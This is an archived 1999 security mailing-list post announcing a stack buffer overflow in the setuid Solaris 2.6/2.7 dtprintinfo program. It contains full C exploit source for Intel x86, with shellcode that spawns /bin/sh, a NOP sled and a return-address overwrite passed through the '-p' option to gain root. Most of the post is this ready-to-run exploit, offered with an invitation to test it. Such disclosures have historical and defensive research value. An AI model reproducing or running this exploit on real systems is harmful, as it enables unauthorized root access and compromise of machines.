Solaris2.6,2.7 dtprintinfo exploits

From: UNYUN@ShadowPenguin
Date: Sun May 09 1999 - 10:12:29 PDT

Next message: Ralf Flaxa: "Re: [linux-security] OpenLinux 2.2: LISA install leaves root"

Previous message: Simon Helson: "Re: Possible DOS in WinNT RAS (PPTP)"
Next in thread: Lamont Granquist: "Re: Solaris2.6,2.7 dtprintinfo exploits"
Reply: Lamont Granquist: "Re: Solaris2.6,2.7 dtprintinfo exploits"
Reply: Darren J Moffat - Enterprise Services OS Product Support Group: "Re: Solaris2.6,2.7 dtprintinfo exploits"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello.

"dtprintinfo" is suid program, the stack buffer can be overflowed by '-p'
option. I made an exploit program that can get root for Intel edition of
Solaris2.6 and Solaris 2.7.
Please test it.
If you test this program, please set DISPLAY environment correctly
before execution.

/*========================================================================
   ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition)
   The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
   Written by UNYUN (unewn4that_private)
  ========================================================================
*/
static char             x[1000];
#define ADJUST          0
#define STARTADR        621
#define BUFSIZE         900
#define NOP             0x90
unsigned long ret_adr;
int     i;
char exploit_code[] =
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
"\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
"\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
"\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
"\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
"\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";

unsigned long get_sp(void)
{
  __asm__(" movl %esp,%eax ");
}
main()
{
        putenv("LANG=");
        for (i=0;i<BUFSIZE;i++) x[i]=NOP;
        for (i=0;i<strlen(exploit_code);i++)
                x[STARTADR+i]=exploit_code[i];
        ret_adr=get_sp() - 1292 + 148;
        for (i = ADJUST; i < 400 ; i+=4){
                x[i+0]=ret_adr & 0xff;
                x[i+1]=(ret_adr >> 8 ) &0xff;
                x[i+2]=(ret_adr >> 16 ) &0xff;
                x[i+3]=(ret_adr >> 24 ) &0xff;
        }
        x[BUFSIZE]=0;
        execl("/usr/dt/bin/dtprintinfo", "dtprintinfo",
        "-p",x,(char *) 0);
}


____________________________________________________________________
Get free e-mail and a permanent address at http://www.netaddress.com/?N=1

Next message: Ralf Flaxa: "Re: [linux-security] OpenLinux 2.2: LISA install leaves root"
Previous message: Simon Helson: "Re: Possible DOS in WinNT RAS (PPTP)"
Next in thread: Lamont Granquist: "Re: Solaris2.6,2.7 dtprintinfo exploits"
Reply: Lamont Granquist: "Re: Solaris2.6,2.7 dtprintinfo exploits"
Reply: Darren J Moffat - Enterprise Services OS Product Support Group: "Re: Solaris2.6,2.7 dtprintinfo exploits"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:45:29 PDT